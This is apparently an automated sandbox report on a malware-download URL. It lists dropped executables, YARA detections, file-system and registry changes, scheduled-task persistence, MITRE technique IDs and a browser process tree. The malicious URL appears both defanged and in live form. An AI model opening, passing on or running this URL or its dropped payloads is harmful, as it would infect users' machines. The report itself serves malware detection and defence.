hxxp://cloudseun[.]com/file/13b6fba

Analysis

max time kernel
116s
max time network
152s
platform
windows10-2004_x64
resource
win10v2004-20231127-en
resource tags

arch:x64arch:x86image:win10v2004-20231127-enlocale:en-usos:windows10-2004-x64system
submitted
10/12/2023, 18:21

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

http://cloudseun.com/file/13b6fba

Score

8^/10

discovery upx

Malware Config

Signatures

Downloads MZ/PE file

Executes dropped EXE 9 IoCs

pid	Process
2180	cfg_zRDsDL23PI.tmp
1800	BluesMediaPlayer.exe
5376	BluesMediaPlayer.exe
6048	4UQ48.exe
3664	7xi7KRrpVxmK28y.exe
4304	7xi7KRrpVxmK28y.tmp
3124	crtgame.exe
5292	crtgame.exe
5860	UECHssE.exe

Loads dropped DLL 9 IoCs

pid	Process
2180	cfg_zRDsDL23PI.tmp
2180	cfg_zRDsDL23PI.tmp
2180	cfg_zRDsDL23PI.tmp
4304	7xi7KRrpVxmK28y.tmp
4304	7xi7KRrpVxmK28y.tmp
4304	7xi7KRrpVxmK28y.tmp
5860	UECHssE.exe
5860	UECHssE.exe
5860	UECHssE.exe

UPX packed file 9 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x002200000002358c-700.dat	upx
behavioral2/files/0x002200000002358c-699.dat	upx
behavioral2/files/0x002200000002358c-706.dat	upx
behavioral2/files/0x000600000002359e-717.dat	upx
behavioral2/files/0x000600000002359e-718.dat	upx
behavioral2/files/0x000600000002359e-716.dat	upx
behavioral2/memory/3044-726-0x0000000000870000-0x0000000000D98000-memory.dmp	upx
behavioral2/files/0x002200000002358c-727.dat	upx
behavioral2/files/0x002200000002358c-734.dat	upx

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\Blues Media Player\is-E1KUR.tmp	cfg_zRDsDL23PI.tmp
File created	C:\Program Files (x86)\Blues Media Player\is-HBQSE.tmp	cfg_zRDsDL23PI.tmp
File created	C:\Program Files (x86)\Blues Media Player\is-CNPK2.tmp	cfg_zRDsDL23PI.tmp
File created	C:\Program Files (x86)\Blues Media Player\is-7C4AI.tmp	cfg_zRDsDL23PI.tmp
File created	C:\Program Files (x86)\CRTGame\uninstall\unins000.dat	7xi7KRrpVxmK28y.tmp
File created	C:\Program Files (x86)\Blues Media Player\is-JBD0A.tmp	cfg_zRDsDL23PI.tmp
File created	C:\Program Files (x86)\Blues Media Player\is-PPMN3.tmp	cfg_zRDsDL23PI.tmp
File created	C:\Program Files (x86)\Blues Media Player\is-L7T62.tmp	cfg_zRDsDL23PI.tmp
File created	C:\Program Files (x86)\CRTGame\bin\x86\is-74580.tmp	7xi7KRrpVxmK28y.tmp
File opened for modification	C:\Program Files (x86)\CRTGame\uninstall\unins000.dat	7xi7KRrpVxmK28y.tmp
File created	C:\Program Files\WProxy\WinProxy\p2p-sdk.dll	4UQ48.exe
File created	C:\Program Files (x86)\Blues Media Player\is-GA0KI.tmp	cfg_zRDsDL23PI.tmp
File created	C:\Program Files (x86)\CRTGame\bin\x86\is-IEG3Q.tmp	7xi7KRrpVxmK28y.tmp
File created	C:\Program Files (x86)\CRTGame\bin\x86\is-B7J96.tmp	7xi7KRrpVxmK28y.tmp
File created	C:\Program Files (x86)\CRTGame\bin\x86\is-88PVH.tmp	7xi7KRrpVxmK28y.tmp
File created	C:\Program Files (x86)\CRTGame\bin\x86\plugins\internal\is-HDTB1.tmp	7xi7KRrpVxmK28y.tmp
File created	C:\Program Files (x86)\Blues Media Player\is-RB5F4.tmp	cfg_zRDsDL23PI.tmp
File created	C:\Program Files (x86)\Blues Media Player\is-4MPGU.tmp	cfg_zRDsDL23PI.tmp
File created	C:\Program Files (x86)\CRTGame\bin\x86\is-3TOJA.tmp	7xi7KRrpVxmK28y.tmp
File created	C:\Program Files (x86)\CRTGame\bin\x86\is-OEETK.tmp	7xi7KRrpVxmK28y.tmp
File created	C:\Program Files (x86)\Blues Media Player\is-V0GVA.tmp	cfg_zRDsDL23PI.tmp
File created	C:\Program Files (x86)\Blues Media Player\is-Q4E97.tmp	cfg_zRDsDL23PI.tmp
File created	C:\Program Files (x86)\CRTGame\bin\x86\lessmsi\is-L24GC.tmp	7xi7KRrpVxmK28y.tmp
File created	C:\Program Files (x86)\Blues Media Player\is-H6LKK.tmp	cfg_zRDsDL23PI.tmp
File created	C:\Program Files (x86)\CRTGame\bin\x86\is-B27MT.tmp	7xi7KRrpVxmK28y.tmp
File opened for modification	C:\Program Files (x86)\CRTGame\crtgame.exe	7xi7KRrpVxmK28y.tmp
File opened for modification	C:\Program Files (x86)\Blues Media Player\unins000.dat	cfg_zRDsDL23PI.tmp
File created	C:\Program Files (x86)\CRTGame\bin\x86\is-KBOD6.tmp	7xi7KRrpVxmK28y.tmp
File created	C:\Program Files (x86)\CRTGame\bin\x86\is-TDGJ4.tmp	7xi7KRrpVxmK28y.tmp
File created	C:\Program Files (x86)\CRTGame\bin\x86\is-RP9AS.tmp	7xi7KRrpVxmK28y.tmp
File created	C:\Program Files (x86)\CRTGame\bin\x86\is-7G3CM.tmp	7xi7KRrpVxmK28y.tmp
File created	C:\Program Files (x86)\CRTGame\bin\x86\is-H5A7D.tmp	7xi7KRrpVxmK28y.tmp
File created	C:\Program Files (x86)\CRTGame\bin\x86\is-KPLIP.tmp	7xi7KRrpVxmK28y.tmp
File created	C:\Program Files (x86)\Blues Media Player\is-8086F.tmp	cfg_zRDsDL23PI.tmp
File created	C:\Program Files (x86)\Blues Media Player\is-F4ED4.tmp	cfg_zRDsDL23PI.tmp
File created	C:\Program Files (x86)\CRTGame\bin\x86\is-J8H2T.tmp	7xi7KRrpVxmK28y.tmp
File created	C:\Program Files (x86)\Blues Media Player\is-SSI53.tmp	cfg_zRDsDL23PI.tmp
File created	C:\Program Files (x86)\CRTGame\bin\x86\is-6QAKE.tmp	7xi7KRrpVxmK28y.tmp
File created	C:\Program Files (x86)\Blues Media Player\is-1M9G5.tmp	cfg_zRDsDL23PI.tmp
File created	C:\Program Files (x86)\CRTGame\bin\x86\is-7KHS9.tmp	7xi7KRrpVxmK28y.tmp
File created	C:\Program Files (x86)\CRTGame\bin\x86\is-E463H.tmp	7xi7KRrpVxmK28y.tmp
File created	C:\Program Files (x86)\CRTGame\bin\x86\is-6HJ4T.tmp	7xi7KRrpVxmK28y.tmp
File created	C:\Program Files (x86)\CRTGame\is-9UNR2.tmp	7xi7KRrpVxmK28y.tmp
File created	C:\Program Files (x86)\Blues Media Player\is-FRNNB.tmp	cfg_zRDsDL23PI.tmp
File created	C:\Program Files (x86)\CRTGame\stuff\is-O12OD.tmp	7xi7KRrpVxmK28y.tmp
File created	C:\Program Files (x86)\CRTGame\bin\x86\is-06ATO.tmp	7xi7KRrpVxmK28y.tmp
File created	C:\Program Files (x86)\CRTGame\bin\x86\is-KCVEH.tmp	7xi7KRrpVxmK28y.tmp
File created	C:\Program Files (x86)\CRTGame\bin\x86\is-FH572.tmp	7xi7KRrpVxmK28y.tmp
File created	C:\Program Files (x86)\CRTGame\bin\x86\is-6T50H.tmp	7xi7KRrpVxmK28y.tmp
File opened for modification	C:\Program Files\WProxy\WinProxy\WinProxy.exe	4UQ48.exe
File created	C:\Program Files (x86)\Blues Media Player\is-6VDQH.tmp	cfg_zRDsDL23PI.tmp
File created	C:\Program Files (x86)\Blues Media Player\Language\is-2TD1Q.tmp	cfg_zRDsDL23PI.tmp
File opened for modification	C:\Program Files (x86)\Blues Media Player\BluesMediaPlayer.exe	cfg_zRDsDL23PI.tmp
File created	C:\Program Files (x86)\CRTGame\bin\x86\is-86UO9.tmp	7xi7KRrpVxmK28y.tmp
File created	C:\Program Files (x86)\CRTGame\bin\x86\is-VJ4TI.tmp	7xi7KRrpVxmK28y.tmp
File created	C:\Program Files (x86)\Blues Media Player\is-HQM98.tmp	cfg_zRDsDL23PI.tmp
File created	C:\Program Files (x86)\CRTGame\bin\x86\is-57RQG.tmp	7xi7KRrpVxmK28y.tmp
File created	C:\Program Files (x86)\CRTGame\bin\x86\is-3UEJP.tmp	7xi7KRrpVxmK28y.tmp
File created	C:\Program Files (x86)\CRTGame\bin\x86\is-TEHUL.tmp	7xi7KRrpVxmK28y.tmp
File created	C:\Program Files (x86)\Blues Media Player\is-J1A7P.tmp	cfg_zRDsDL23PI.tmp
File created	C:\Program Files (x86)\Blues Media Player\is-6IQA2.tmp	cfg_zRDsDL23PI.tmp
File created	C:\Program Files (x86)\CRTGame\bin\x86\is-AIF02.tmp	7xi7KRrpVxmK28y.tmp
File created	C:\Program Files (x86)\CRTGame\bin\x86\is-HOIIN.tmp	7xi7KRrpVxmK28y.tmp
File created	C:\Program Files (x86)\CRTGame\stuff\is-GRJL7.tmp	7xi7KRrpVxmK28y.tmp

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 58 IoCs

pid	pid_target	Process	procid_target
5256	1800	WerFault.exe	134
5144	1800	WerFault.exe	134
2220	1800	WerFault.exe	134
5576	5376	WerFault.exe	142
2380	5376	WerFault.exe	142
3684	5376	WerFault.exe	142
5764	5376	WerFault.exe	142
5204	5376	WerFault.exe	142
2220	5376	WerFault.exe	142
5440	5376	WerFault.exe	142
5576	5376	WerFault.exe	142
5604	5376	WerFault.exe	142
5828	5376	WerFault.exe	142
3552	5376	WerFault.exe	142
1152	5376	WerFault.exe	142
4992	5376	WerFault.exe	142
1344	5376	WerFault.exe	142
5192	5376	WerFault.exe	142
2276	5376	WerFault.exe	142
5444	5376	WerFault.exe	142
1760	5376	WerFault.exe	142
5572	5376	WerFault.exe	142
3428	5376	WerFault.exe	142
5960	5376	WerFault.exe	142
5992	5376	WerFault.exe	142
4624	5376	WerFault.exe	142
1648	5376	WerFault.exe	142
1476	5376	WerFault.exe	142
3684	5376	WerFault.exe	142
5988	5376	WerFault.exe	142
4456	5376	WerFault.exe	142
2044	5376	WerFault.exe	142
6012	5376	WerFault.exe	142
4852	5376	WerFault.exe	142
3280	5376	WerFault.exe	142
5780	5376	WerFault.exe	142
5292	5376	WerFault.exe	142
2220	5376	WerFault.exe	142
5712	5376	WerFault.exe	142
5824	5376	WerFault.exe	142
1956	5376	WerFault.exe	142
1692	5376	WerFault.exe	142
5572	5376	WerFault.exe	142
4460	5376	WerFault.exe	142
2600	5376	WerFault.exe	142
1684	5376	WerFault.exe	142
5444	5376	WerFault.exe	142
4528	5376	WerFault.exe	142
5848	5376	WerFault.exe	142
4596	5376	WerFault.exe	142
1692	5376	WerFault.exe	142
5672	5376	WerFault.exe	142
5568	5376	WerFault.exe	142
5824	5376	WerFault.exe	142
5980	5376	WerFault.exe	142
3560	5376	WerFault.exe	142
3060	5376	WerFault.exe	142
5164	5376	WerFault.exe	142

NSIS installer 4 IoCs

installer

resource	yara_rule
behavioral2/files/0x003300000001e601-604.dat	nsis_installer_1
behavioral2/files/0x003300000001e601-604.dat	nsis_installer_2
behavioral2/files/0x003300000001e601-603.dat	nsis_installer_1
behavioral2/files/0x003300000001e601-603.dat	nsis_installer_2

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
1212	schtasks.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Modifies registry class 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2598572287-1024438387-935107970-1000_Classes\Local Settings	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-2598572287-1024438387-935107970-1000_Classes\Local Settings	BluesMediaPlayer.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 28 IoCs

pid	Process
2152	msedge.exe
2152	msedge.exe
3508	msedge.exe
3508	msedge.exe
4120	identity_helper.exe
4120	identity_helper.exe
5240	msedge.exe
5240	msedge.exe
5376	BluesMediaPlayer.exe
5376	BluesMediaPlayer.exe
5376	BluesMediaPlayer.exe
5376	BluesMediaPlayer.exe
5512	WerFault.exe
5512	WerFault.exe
4136	powershell.exe
4136	powershell.exe
4136	powershell.exe
5512	WerFault.exe
4460	WerFault.exe
4460	WerFault.exe
4460	WerFault.exe
6048	4UQ48.exe
6048	4UQ48.exe
5860	UECHssE.exe
5860	UECHssE.exe
5860	UECHssE.exe
5860	UECHssE.exe
5860	UECHssE.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 10 IoCs

pid	Process
3508	msedge.exe
3508	msedge.exe
3508	msedge.exe
3508	msedge.exe
3508	msedge.exe
3508	msedge.exe
3508	msedge.exe
3508	msedge.exe
3508	msedge.exe
3508	msedge.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	5512	WerFault.exe
Token: SeDebugPrivilege	4136	powershell.exe
Token: SeDebugPrivilege	4460	WerFault.exe
Token: SeDebugPrivilege	6048	4UQ48.exe

Suspicious use of FindShellTrayWindow 38 IoCs

pid	Process
3508	msedge.exe
3508	msedge.exe
3508	msedge.exe
3508	msedge.exe
3508	msedge.exe
3508	msedge.exe
3508	msedge.exe
3508	msedge.exe
3508	msedge.exe
3508	msedge.exe
3508	msedge.exe
3508	msedge.exe
3508	msedge.exe
3508	msedge.exe
3508	msedge.exe
3508	msedge.exe
3508	msedge.exe
3508	msedge.exe
3508	msedge.exe
3508	msedge.exe
3508	msedge.exe
3508	msedge.exe
3508	msedge.exe
3508	msedge.exe
3508	msedge.exe
3508	msedge.exe
3508	msedge.exe
3508	msedge.exe
3508	msedge.exe
3508	msedge.exe
3508	msedge.exe
3508	msedge.exe
3508	msedge.exe
3508	msedge.exe
3508	msedge.exe
3508	msedge.exe
2180	cfg_zRDsDL23PI.tmp
4304	7xi7KRrpVxmK28y.tmp

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
3508	msedge.exe
3508	msedge.exe
3508	msedge.exe
3508	msedge.exe
3508	msedge.exe
3508	msedge.exe
3508	msedge.exe
3508	msedge.exe
3508	msedge.exe
3508	msedge.exe
3508	msedge.exe
3508	msedge.exe
3508	msedge.exe
3508	msedge.exe
3508	msedge.exe
3508	msedge.exe
3508	msedge.exe
3508	msedge.exe
3508	msedge.exe
3508	msedge.exe
3508	msedge.exe
3508	msedge.exe
3508	msedge.exe
3508	msedge.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3508 wrote to memory of 1548	3508	msedge.exe	38
PID 3508 wrote to memory of 1548	3508	msedge.exe	38
PID 3508 wrote to memory of 1688	3508	msedge.exe	88
PID 3508 wrote to memory of 1688	3508	msedge.exe	88
PID 3508 wrote to memory of 1688	3508	msedge.exe	88
PID 3508 wrote to memory of 1688	3508	msedge.exe	88
PID 3508 wrote to memory of 1688	3508	msedge.exe	88
PID 3508 wrote to memory of 1688	3508	msedge.exe	88
PID 3508 wrote to memory of 1688	3508	msedge.exe	88
PID 3508 wrote to memory of 1688	3508	msedge.exe	88
PID 3508 wrote to memory of 1688	3508	msedge.exe	88
PID 3508 wrote to memory of 1688	3508	msedge.exe	88
PID 3508 wrote to memory of 1688	3508	msedge.exe	88
PID 3508 wrote to memory of 1688	3508	msedge.exe	88
PID 3508 wrote to memory of 1688	3508	msedge.exe	88
PID 3508 wrote to memory of 1688	3508	msedge.exe	88
PID 3508 wrote to memory of 1688	3508	msedge.exe	88
PID 3508 wrote to memory of 1688	3508	msedge.exe	88
PID 3508 wrote to memory of 1688	3508	msedge.exe	88
PID 3508 wrote to memory of 1688	3508	msedge.exe	88
PID 3508 wrote to memory of 1688	3508	msedge.exe	88
PID 3508 wrote to memory of 1688	3508	msedge.exe	88
PID 3508 wrote to memory of 1688	3508	msedge.exe	88
PID 3508 wrote to memory of 1688	3508	msedge.exe	88
PID 3508 wrote to memory of 1688	3508	msedge.exe	88
PID 3508 wrote to memory of 1688	3508	msedge.exe	88
PID 3508 wrote to memory of 1688	3508	msedge.exe	88
PID 3508 wrote to memory of 1688	3508	msedge.exe	88
PID 3508 wrote to memory of 1688	3508	msedge.exe	88
PID 3508 wrote to memory of 1688	3508	msedge.exe	88
PID 3508 wrote to memory of 1688	3508	msedge.exe	88
PID 3508 wrote to memory of 1688	3508	msedge.exe	88
PID 3508 wrote to memory of 1688	3508	msedge.exe	88
PID 3508 wrote to memory of 1688	3508	msedge.exe	88
PID 3508 wrote to memory of 1688	3508	msedge.exe	88
PID 3508 wrote to memory of 1688	3508	msedge.exe	88
PID 3508 wrote to memory of 1688	3508	msedge.exe	88
PID 3508 wrote to memory of 1688	3508	msedge.exe	88
PID 3508 wrote to memory of 1688	3508	msedge.exe	88
PID 3508 wrote to memory of 1688	3508	msedge.exe	88
PID 3508 wrote to memory of 1688	3508	msedge.exe	88
PID 3508 wrote to memory of 1688	3508	msedge.exe	88
PID 3508 wrote to memory of 2152	3508	msedge.exe	87
PID 3508 wrote to memory of 2152	3508	msedge.exe	87
PID 3508 wrote to memory of 3568	3508	msedge.exe	89
PID 3508 wrote to memory of 3568	3508	msedge.exe	89
PID 3508 wrote to memory of 3568	3508	msedge.exe	89
PID 3508 wrote to memory of 3568	3508	msedge.exe	89
PID 3508 wrote to memory of 3568	3508	msedge.exe	89
PID 3508 wrote to memory of 3568	3508	msedge.exe	89
PID 3508 wrote to memory of 3568	3508	msedge.exe	89
PID 3508 wrote to memory of 3568	3508	msedge.exe	89
PID 3508 wrote to memory of 3568	3508	msedge.exe	89
PID 3508 wrote to memory of 3568	3508	msedge.exe	89
PID 3508 wrote to memory of 3568	3508	msedge.exe	89
PID 3508 wrote to memory of 3568	3508	msedge.exe	89
PID 3508 wrote to memory of 3568	3508	msedge.exe	89
PID 3508 wrote to memory of 3568	3508	msedge.exe	89
PID 3508 wrote to memory of 3568	3508	msedge.exe	89
PID 3508 wrote to memory of 3568	3508	msedge.exe	89
PID 3508 wrote to memory of 3568	3508	msedge.exe	89
PID 3508 wrote to memory of 3568	3508	msedge.exe	89
PID 3508 wrote to memory of 3568	3508	msedge.exe	89
PID 3508 wrote to memory of 3568	3508	msedge.exe	89

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://cloudseun.com/file/13b6fba
1⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3508
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff8483246f8,0x7ff848324708,0x7ff848324718
  2⤵
  PID:1548
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1908,12835526781155094859,5118195008935750161,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2236 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2152
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1908,12835526781155094859,5118195008935750161,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2152 /prefetch:2
  2⤵
  PID:1688
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1908,12835526781155094859,5118195008935750161,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2872 /prefetch:8
  2⤵
  PID:3568
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,12835526781155094859,5118195008935750161,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3192 /prefetch:1
  2⤵
  PID:3504
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,12835526781155094859,5118195008935750161,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3176 /prefetch:1
  2⤵
  PID:3268
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,12835526781155094859,5118195008935750161,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5064 /prefetch:1
  2⤵
  PID:2200
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1908,12835526781155094859,5118195008935750161,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3352 /prefetch:8
  2⤵
  PID:2680
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1908,12835526781155094859,5118195008935750161,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3352 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4120
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,12835526781155094859,5118195008935750161,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4160 /prefetch:1
  2⤵
  PID:4656
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,12835526781155094859,5118195008935750161,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=180 /prefetch:1
  2⤵
  PID:4160
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,12835526781155094859,5118195008935750161,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5096 /prefetch:1
  2⤵
  PID:1536
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,12835526781155094859,5118195008935750161,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3732 /prefetch:1
  2⤵
  PID:4472
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,12835526781155094859,5118195008935750161,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3180 /prefetch:1
  2⤵
  PID:4964
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,12835526781155094859,5118195008935750161,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3200 /prefetch:1
  2⤵
  PID:1808
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,12835526781155094859,5118195008935750161,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5900 /prefetch:1
  2⤵
  PID:1776
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=1908,12835526781155094859,5118195008935750161,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5476 /prefetch:8
  2⤵
  PID:3124
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1908,12835526781155094859,5118195008935750161,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5732 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:5240
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1908,12835526781155094859,5118195008935750161,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=3380 /prefetch:2
  2⤵
  PID:5692

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4360

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:824

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:1948

C:\Users\Admin\AppData\Local\Temp\Temp1_cfg_zRDsDL23PI.zip\cfg_zRDsDL23PI.exe
"C:\Users\Admin\AppData\Local\Temp\Temp1_cfg_zRDsDL23PI.zip\cfg_zRDsDL23PI.exe"
1⤵
PID:6116
- C:\Users\Admin\AppData\Local\Temp\is-I4NO6.tmp\cfg_zRDsDL23PI.tmp
